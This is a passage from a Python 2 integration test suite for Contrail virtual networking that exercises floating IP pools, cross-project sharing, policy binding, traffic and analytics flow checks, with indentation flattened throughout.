project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
fip_id2 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id2)
assert fip_fixture1.verify_fip(fip_id2, vn2_vm1_fixture, fvn1_fixture)
self.logger.info(
'Ping from from VM %s to Other VM in different network with FIP %s ' %
(vn1_vm1_name, fip_fixture1.fip[fip_id2]))
if not vn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id2]):
result = result and False
self.logger.info('Ping from from VM %s to IP %s in VN %s' %
(vn1_vm1_name, fvn2_vm1_fixture.vm_ip, fvn2_vm1_name))
if not vn1_vm1_fixture.ping_with_certainty(fvn2_vm1_fixture.vm_ip):
result = result and False
# Unbind
fvn1_fixture.unbind_policies(
fvn1_fixture.vn_id, [policy1_fixture.policy_fq_name])
fvn2_fixture.unbind_policies(
fvn2_fixture.vn_id, [policy2_fixture.policy_fq_name])
sleep(2)
if not vn1_vm1_fixture.ping_to_ip(fvn2_vm1_fixture.vm_ip):
self.logger.info(
"Here ping should fail from VM as Policy is removed from the VN")
else:
self.logger.error(
"Ping should fail. But ping is successful even after removal of policy")
result = result and False
self.logger.info('Communication via FIP should still works ')
self.logger.info(
'Ping from from VM %s to Other VM in different network with FIP %s ' %
(vn1_vm1_name, fip_fixture1.fip[fip_id2]))
if not vn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id2]):
result = result and False
# Rebind the policy here for cleanup purpose.
fvn1_fixture.bind_policies(
[policy1_fixture.policy_fq_name], fvn1_fixture.vn_id)
fvn2_fixture.bind_policies(
[policy2_fixture.policy_fq_name], fvn2_fixture.vn_id)
if not result:
self.logger.error('Test VN info in agent with FIP failed')
assert result
return True
# test_fip_with_policy
@preposttest_wrapper
def test_fip_pool_shared_across_project(self):
''' Verify FIP Pool is shared accorss diffrent projects.
'''
result = True
fip_pool_name = 'small-pool1'
fvn_name = 'floating-vn'
fvm_name = 'floating-vm'
fvn_subnets = ['121.1.1.0/30']
vm1_name = 'vm400'
vn1_name = 'vn400'
vn1_subnets = ['131.1.1.0/24']
vm2_name = 'vm500'
vn2_name = 'vn500'
vn2_subnets = ['141.1.1.0/24']
self.demo_proj_inputs1 = self.useFixture(ContrailTestInit(
self.ini_file, stack_user='admin', stack_password='contrail123', project_fq_name=['default-domain', 'demo']))
self.demo_proj_connections1 = ContrailConnections(
self.demo_proj_inputs1)
# VN Fixture
fvn_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name, inputs=self.inputs, subnets=fvn_subnets))
assert fvn_fixture.verify_on_setup()
fvn_fixture1 = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name, inputs=self.inputs, subnets=fvn_subnets))
assert fvn_fixture1.verify_on_setup()
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn2_fixture = self.useFixture(
VNFixture(
project_name='demo', connections=self.demo_proj_connections1,
vn_name=vn2_name, inputs=self.demo_proj_inputs1, subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
# VM Fixture
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1_fixture.obj, vm_name=vm1_name))
vm2_fixture = self.useFixture(
VMFixture(
project_name='demo', connections=self.demo_proj_connections1,
vn_obj=vn2_fixture.obj, vm_name=vm2_name))
# fvm_fixture= self.useFixture(VMFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_obj= fvn_fixture.obj, vm_name= fvm_name))
assert vm1_fixture.verify_on_setup()
assert vm2_fixture.verify_on_setup()
#assert fvm_fixture.verify_on_setup()
# Floating Ip Fixture
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
# Adding further projects to floating IP.
self.logger.info('Adding project demo to FIP pool %s' %
(fip_pool_name))
project_obj = fip_fixture.assoc_project(fip_fixture, 'demo')
# Asscociating FIP to VM under demo project
self.logger.info(
'Allocating FIP to VM %s in Demo project from VN %s under admin project' %
(vm2_name, fvn_name))
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm2_fixture.vm_id, project_obj)
assert fip_fixture.verify_fip(fip_id, vm2_fixture, fvn_fixture)
self.logger.info(
'FIP pool is exhausted now. Trying to add FIP to VM under admin project. Should FAIL')
fip_id1 = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
if fip_id1 != None:
self.logger.error(
'FIP should not get created/asscocited as pool is already exhusted')
result = result and False
self.logger.info(
'Releasing FIP to VM %s in Demo project from VN %s under admin project' %
(vm2_name, fvn_name))
fip_fixture.disassoc_and_delete_fip(fip_id)
if result is True:
self.logger.info(
'Allocating FIP to VM %s in admin project from VN %s under admin project' %
(vm1_name, fvn_name))
fip_id2 = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id2, vm1_fixture, fvn_fixture)
fip_fixture.disassoc_and_delete_fip(fip_id2)
# Removing further projects from floating IP pool. For cleanup
self.logger.info('Removing project demo to FIP pool %s' %
(fip_pool_name))
project_obj = fip_fixture.deassoc_project(fip_fixture, 'demo')
if not result:
self.logger.error(
'Test Failed:Verify FIP Pool is shared accorss diffrent projects')
assert result
return True
# end test_fip_pool_shared_across_project
@preposttest_wrapper
def test_communication_across__diff_proj(self):
''' Test communication across diffrent projects using Floating IP.
'''
result = True
fip_pool_name = 'some-pool2'
vm_names = ['Test_Vm_100', 'Test_VM_200']
vn_names = ['Test_Vn_100', 'Test_Vn_200']
vn_subnets = [['31.1.1.0/24'], ['41.1.1.0/24']]
projects = ['project111', 'project222']
user_list = [('test1', 'test123', 'admin'),
('test2', 'test123', 'admin')]
# Making sure VM falls on diffrent compute host
host_list = []
for host in self.inputs.compute_ips:
host_list.append(self.inputs.host_data[host]['name'])
compute_1 = host_list[0]
compute_2 = host_list[0]
if len(host_list) > 1:
compute_1 = host_list[0]
compute_2 = host_list[1]
# Projects
project_fixture1 = self.useFixture(
ProjectFixture(
project_name=projects[
0], vnc_lib_h=self.vnc_lib, username=user_list[0][0],
password=user_list[0][1], connections=self.connections))
project_inputs1 = self.useFixture(
ContrailTestInit(
self.ini_file, stack_user=project_fixture1.username,
stack_password=project_fixture1.password, project_fq_name=['default-domain', projects[0]]))
project_connections1 = ContrailConnections(project_inputs1)
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
projects[0])
project_fixture1.set_sec_group_for_allow_all(projects[0], 'default')
project_fixture2 = self.useFixture(
ProjectFixture(
project_name=projects[
1], vnc_lib_h=self.vnc_lib, username=user_list[1][0],
password=user_list[1][1], connections=self.connections))
project_inputs2 = self.useFixture(
ContrailTestInit(
self.ini_file, stack_user=project_fixture2.username,
stack_password=project_fixture2.password, project_fq_name=['default-domain', projects[1]]))
project_connections2 = ContrailConnections(project_inputs2)
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
projects[1])
project_fixture2.set_sec_group_for_allow_all(projects[1], 'default')
# VN
vn1_fixture = self.useFixture(
VNFixture(
project_name=projects[0], connections=project_connections1,
vn_name=vn_names[0], inputs=project_inputs1, subnets=vn_subnets[0]))
vn2_fixture = self.useFixture(
VNFixture(
project_name=projects[1], connections=project_connections2,
vn_name=vn_names[1], inputs=project_inputs2, subnets=vn_subnets[1]))
assert vn1_fixture.verify_on_setup()
assert vn2_fixture.verify_on_setup()
# VM
vm1_fixture = self.useFixture(
VMFixture(connections=project_connections1,
vn_obj=vn1_fixture.obj, vm_name=vm_names[0], project_name=projects[0], node_name=compute_1))
vm2_fixture = self.useFixture(
VMFixture(connections=project_connections2,
vn_obj=vn2_fixture.obj, vm_name=vm_names[1], project_name=projects[1], node_name=compute_2))
assert vm1_fixture.verify_on_setup()
assert vm2_fixture.verify_on_setup()
vm1_fixture.wait_till_vm_is_up()
vm2_fixture.wait_till_vm_is_up()
# Floating Ip Fixture
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=project_inputs1.project_name, inputs=project_inputs1,
connections=project_connections1, pool_name=fip_pool_name, vn_id=vn1_fixture.vn_id))
assert fip_fixture.verify_on_setup()
# Adding further projects to floating IP.
self.logger.info('Adding project demo to FIP pool %s' %
(fip_pool_name))
project_obj = fip_fixture.assoc_project(fip_fixture, projects[0])
self.logger.info(
'Allocating FIP to VM %s in project %s from VN %s in project %s ' %
(vm2_fixture.vm_name, projects[1], vn_names[0], projects[0]))
fip_id = fip_fixture.create_and_assoc_fip(
vn1_fixture.vn_id, vm2_fixture.vm_id, project_obj)
assert fip_fixture.verify_fip(fip_id, vm2_fixture, vn1_fixture)
if not vm1_fixture.ping_with_certainty(fip_fixture.fip[fip_id]):
result = result and False
fip_fixture.disassoc_and_delete_fip(fip_id)
# Removing further projects from floating IP pool. For cleanup
self.logger.info('Removing project %s from FIP pool %s' %
(projects[0], fip_pool_name))
project_obj = fip_fixture.deassoc_project(fip_fixture, projects[0])
if not result:
self.logger.error(
'Test Failed:Test communication across diffrent projects using Floating IP')
assert result
return result
# end test_communication_across__diff_proj
def remove_from_cleanups(self, fix):
for cleanup in self._cleanups:
self._cleanups.remove(cleanup)
# end remove_from_cleanups
@preposttest_wrapper
def test_traffic_to_fip(self):
'''Testtraffic accross borrower and giving VN.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not fvn1_vm1_traffic_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
# Send UDP traffic
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
vn1_vm1_traffic_fixture.install_pkg("Traffic")
src_vn = 'default-domain' + ':' + \
self.inputs.project_name + ':' + fvn1_fixture.vn_name
dst_vn = 'default-domain' + ':' + \
self.inputs.project_name + ':' + fvn1_fixture.vn_name
query = {}
query['udp'] = '(' + 'sourcevn=' + src_vn + ') AND (destvn=' + dst_vn + ') AND (protocol =17) AND (sourceip = ' + \
fip_fixture1.fip[fip_id1] + \
') AND (destip = ' + \
fvn1_vm1_traffic_fixture.vm_ip + ')'
flow_record_data = {}
flow_series_data = {}
start_time = self.analytics_obj.getstarttime(
fvn1_vm1_traffic_fixture.vm_node_ip)
self.logger.info("start time= %s" % (start_time))
sleep(5)
# Verify Traffic ---
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['udp']
total_streams = {}
total_streams['udp'] = 1
dpi = 9100
proto = 'udp'
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=fvn1_vm1_traffic_fixture, rx_vm_fixture=vn1_vm1_traffic_fixture, stream_proto=proto, chksum=True, fip=fip_fixture1.fip[fip_id1])
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, fvn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
sleep(5)
for proto in traffic_proto_l:
flow_record_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query('FlowRecordTable', dir=0, start_time=start_time, end_time='now', select_fields=[
'sourcevn', 'sourceip', 'destvn', 'destip', 'setup_time', 'teardown_time', 'agg-packets', 'agg-bytes', 'protocol'], where_clause=query[proto])
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time=start_time, end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
msg = proto + \
" Flow count info is not matching with opserver flow series record"
# self.assertEqual(flow_series_data[proto][0]['flow_count'],total_streams[proto],msg)
assert(flow_series_data[proto][0]
['flow_count'] == total_streams[proto]), msg
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
if stopStatus[proto] != []:
result = False
self.logger.info("Status of stop traffic for proto %s is %s" %
(proto, stopStatus[proto]))
for rcv_count in range(0, total_streams[proto]):
if traffic_obj[proto].receiver[rcv_count].corrupt > 0:
self.logger.error(
"In Stream %s of %s, %s packets are corrupted" %
(rcv_count, proto, traffic_obj[proto].receiver[rcv_count].corrupt))
result = False
else:
self.logger.info(
"In Stream %s of %s, No packets are corrupted" %
(rcv_count, proto))
self.logger.info("-" * 80)
# Get the traffic Stats for each protocol sent
traffic_stats[proto] = traffic_obj[proto].returnStats()
# Get the Opserver Flow series data
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time=start_time, end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
self.logger.info("-" * 80)
#self.assertEqual(result, True, msg)
assert(result == True), msg
for proto in traffic_proto_l:
self.logger.info(
" verify %s traffic status against to Analytics flow series data" % (proto))
msg = proto + \
" Traffic Stats is not matching with opServer flow series data"
self.logger.info(
"***Actual Traffic sent by agent %s \n\n stats shown by Analytics flow series%s" %
(traffic_stats[proto], flow_series_data[proto]))
print flow_series_data[proto]
for i in xrange(len(flow_series_data[proto]) - 1):
if flow_series_data[proto][i]['destip'] == fip_fixture1.fip[fip_id1]:
# self.assertGreaterEqual(flow_series_data[proto][i]['sum(packets)'],traffic_stats[proto]['total_pkt_sent'],msg)
assert(flow_series_data[proto][i]['sum(packets)']
>= traffic_stats[proto]['total_pkt_sent']), msg
self.logger.info("-" * 80)
self.logger.info(
"***Let flows age out and verify analytics still shows the data in the history***")
self.logger.info("-" * 80)
time.sleep(180)
for proto in traffic_proto_l:
self.logger.info(
" verify %s traffic status against Analytics flow series data after flow age out" % (proto))
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time='now', end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
msg = proto + \
" Flow count info is not matching with opserver flow series record after flow age out in kernel"
# self.assertEqual(len(flow_series_data[proto]),0,msg)
assert(len(flow_series_data[proto]) == 0), msg
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time=start_time, end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
msg = proto + \
" Traffic Stats is not matching with opServer flow series data after flow age out in kernel"
# Historical data should be present in the Analytics, even if flows
# age out in kernel
for i in xrange(len(flow_series_data[proto]) - 1):
if flow_series_data[proto][i]['destip'] == fip_fixture1.fip[fip_id1]:
# self.assertGreaterEqual(flow_series_data[proto][i]['sum(packets)'],traffic_stats[proto]['total_pkt_sent'],msg)
assert(flow_series_data[proto][i]['sum(packets)']
>= traffic_stats[proto]['total_pkt_sent']), msg
if not result:
self.logger.error(
'Test Failed. Floating IP test with traffic failed')
assert result
return result
# end test_fip_with_traffic
@preposttest_wrapper
def test_ping_to_fip_using_diag(self):
'''Test ping to floating IP using diag introspect.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.fvn1_vm1_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
inspect_h1 = self.agent_inspect[fvn1_vm1_fixture.vm_node_ip]
self.logger.info("Pinging using diag introspect from IP %s to IP %s" %
(fvn1_vm1_fixture.vm_ip, fip_fixture1.fip[fip_id1]))
result = inspect_h1.get_vna_verify_diag_ping(src_ip=fvn1_vm1_fixture.vm_ip, dst_ip=fip_fixture1.fip[
fip_id1], vrf=fvn1_vm1_fixture.agent_vrf_objs['vrf_list'][0]['name'], proto='17')
if not result:
self.logger.error('Test to ping uding diag between VMs %s and %s' %
(fvn1_vm1_fixture.vm_ip, fip_fixture1.fip[fip_id1]))
assert result
return result
# end test_ping_to_fip_using_diag
@preposttest_wrapper
def test_floating_ip(self):
'''Test to validate floating-ip Assignment to a VM. It creates a VM, assigns a FIP to it and pings to a IP in the FIP VN.
'''
result = True
fip_pool_name = 'some-pool1'
fvn_name = self.res.fvn1_name
fvn_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
fvn_vm1_fixture = self.res.fvn1_vm1_fixture
fvn_subnets = self.res.fvn1_subnets
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
assert fvn_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert fvn_vm1_fixture.verify_on_setup()
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn1_vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vn1_vm1_fixture, fvn_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fvn_vm1_fixture.vm_ip):
result = result and False
fip_fixture.disassoc_and_delete_fip(fip_id)
if not result:
self.logger.error('Test to ping between VMs %s and %s' %
(vn1_vm1_name, fvn_vm1_name))
assert result
return True
# end test_floating_ip
@preposttest_wrapper
def test_tcp_transfer_from_fip_vm(self):
''' Validate data transfer through floating ip.
'''
self.logger.info('Reading default encap priority before continuing')
default_encap_prior = self.connections.read_vrouter_config_encap()
self.logger.info("Default encap priority is %s" % default_encap_prior)
self.logger.info('Setting new Encap before continuing')
config_id = self.connections.update_vrouter_config_encap(
'MPLSoGRE', 'MPLSoUDP', 'VXLAN')
self.logger.info(
'Created.UUID is %s. MPLSoGRE is the highest priority encap' % (config_id))
self.addCleanup(self.connections.update_vrouter_config_encap, encap1=default_encap_prior[
0], encap2=default_encap_prior[1], encap3=default_encap_prior[2])
fip_pool_name = 'testpool'
fvn_name = 'vn-public'
fvm_name = 'fvm'
fvn_subnets = ['100.1.1.0/24']
vn1_name = 'vn-frontend'
vm1_name = 'vm-fe'
vn1_subnets = ['192.168.1.0/24']
vn2_name = 'vn-backend'
vm2_name = 'vm-be'
vn2_subnets = ['192.168.2.0/24']
# policy between frontend and backend
policy_name = 'frontend-to-backend-policy'
rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'any',
'source_network': vn1_name,
'dest_network': vn2_name,
},
]
policy_fixture = self.useFixture(
PolicyFixture(policy_name=policy_name,
rules_list=rules, inputs=self.inputs,
connections=self.connections))
# frontend VN
vn1_fixture = self.useFixture(VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets,
policy_objs=[policy_fixture.policy_obj]))
vn1_fixture.verify_on_setup()
# backend VN
vn2_fixture = self.useFixture(VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn2_name, inputs=self.inputs, subnets=vn2_subnets,
policy_objs=[policy_fixture.policy_obj]))
vn2_fixture.verify_on_setup()
# public VN
fvn_fixture = self.useFixture(VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name, inputs=self.inputs, subnets=fvn_subnets))
fvn_fixture.verify_on_setup()
# frontend VM
vm1_fixture = self.useFixture(VMFixture(image_name='redmine-fe',
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1_fixture.obj, vm_name=vm1_name, flavor='contrail_flavor_medium'))
# backend VM
vm2_fixture = self.useFixture(VMFixture(image_name='redmine-be',
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn2_fixture.obj, vm_name=vm2_name, flavor='contrail_flavor_medium'))
# public VM
fvm_fixture = self.useFixture(VMFixture(image_name='ubuntu',
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=fvn_fixture.obj, vm_name=fvm_name))
assert vm1_fixture.verify_on_setup()
assert vm2_fixture.verify_on_setup()
assert fvm_fixture.verify_on_setup()
fip_fixture = self.useFixture(FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name,
vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(fvn_fixture.vn_id,
vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
fip = vm1_fixture.vnc_lib_h.floating_ip_read(
id=fip_id).get_floating_ip_address()
assert fvm_fixture.ping_with_certainty(fip)
result = fvm_fixture.tcp_data_transfer(vm1_fixture.local_ip, fip)
assert result
return result
# end test_tcp_transfer_from_fip_vm
@preposttest_wrapper
def test_multiple_floating_ip_for_single_vm(self):
'''Test to validate floating-ip Assignment to a VM. It creates a VM, assigns a FIP to it and pings to a IP in the FIP VN.
'''
result = True
fip_pool_name = 'some-other-pool1'
fvn_name = self.res.fvn1_name
fvm_name = self.res.fvn1_vm1_name
fvn_subnets = self.res.fvn1_subnets
fip_pool_name1 = 'some-pool2'
fvn_name1 = 'fvnn200'
fvm_name1 = 'vm200'
fvn_subnets1 = ['150.1.1.0/24']
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
# VN Fixture
# fvn_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_name=fvn_name, inputs= self.inputs, subnets= fvn_subnets))
fvn_fixture = self.res.fvn1_fixture
assert fvn_fixture.verify_on_setup()
fvn_fixture1 = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name1, inputs=self.inputs, subnets=fvn_subnets1))
assert fvn_fixture1.verify_on_setup()
# vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
vn1_fixture = self.res.vn1_fixture
assert vn1_fixture.verify_on_setup()
# VM Fixture
# vm1_fixture= self.useFixture(VMFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_obj= vn1_fixture.obj, vm_name= vm1_name))
vm1_fixture = self.res.vn1_vm1_fixture
assert vm1_fixture.verify_on_setup()
# fvm_fixture= self.useFixture(VMFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_obj= fvn_fixture.obj, vm_name= fvm_name))
fvm_fixture = self.res.fvn1_vm1_fixture
assert fvm_fixture.verify_on_setup()
fvm_fixture1 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=fvn_fixture1.obj, vm_name=fvm_name1))
assert fvm_fixture1.verify_on_setup()
# Floating Ip Fixture
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn_fixture1.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
fip_id1 = fip_fixture.create_and_assoc_fip(
fvn_fixture1.vn_id, vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id1, vm1_fixture, fvn_fixture1)
# Check the communication from borrower VM to all 2 networks
if not vm1_fixture.ping_with_certainty(fvm_fixture.vm_ip):
result = result and False
if not vm1_fixture.ping_with_certainty(fvm_fixture1.vm_ip):
result = result and False
# Check the floating IP provider VNs should commmunicate with each
# other
self.logger.info(
'Ping should fail here. %s and %s should not able to communicate with each oether' %
(fvm_name1, fvm_name))
if fvm_fixture1.ping_to_ip(fvm_fixture.vm_ip):
result = result and False
# Check after disscocition of floating ip communication should and only
# should stop from that network
fip_fixture.disassoc_and_delete_fip(fip_id)
self.logger.info(
'Ping should fail here as floating IP pool is already released')
if vm1_fixture.ping_to_ip(fvm_fixture.vm_ip):
result = result and False
if not vm1_fixture.ping_with_certainty(fvm_fixture1.vm_ip):
result = result and False
fip_fixture1.disassoc_and_delete_fip(fip_id1)
if not result:
self.logger.error(
'Test to check multiple floating ip for single VM has failed')
assert result
return True
# end test_floating_ip
@preposttest_wrapper
def test_longest_prefix_match_with_fip_and_staticroute(self):
'''1. Create vn1 and vn2 launch vm1, vm2 in vn1 and vm3 in vn2
2. Create static ip with vn2 subnet pointing to vm2
3. Allocate fip vn2 to vm1
4. Expect ping from vm1 to vm3 to pass, following longest prefix match
'''
result = True
vn1_name = 'vn111'
vn1_subnets = ['1.1.1.0/24']
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj = vn1_fixture.obj
vn2_name = 'vn222'
vn2_subnets = ['2.2.2.0/24']
vn2_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn2_name, inputs=self.inputs, subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj = vn2_fixture.obj
vm1_name = 'vm111'
vm1_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn1_obj, vm_name=vm1_name, project_name=self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name = 'vm222'
vm2_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn1_obj, vm_name=vm2_name, project_name=self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
vm3_name = 'vm333'
vm3_fixture = self.useFixture(VMFixture(connections=self.connections,
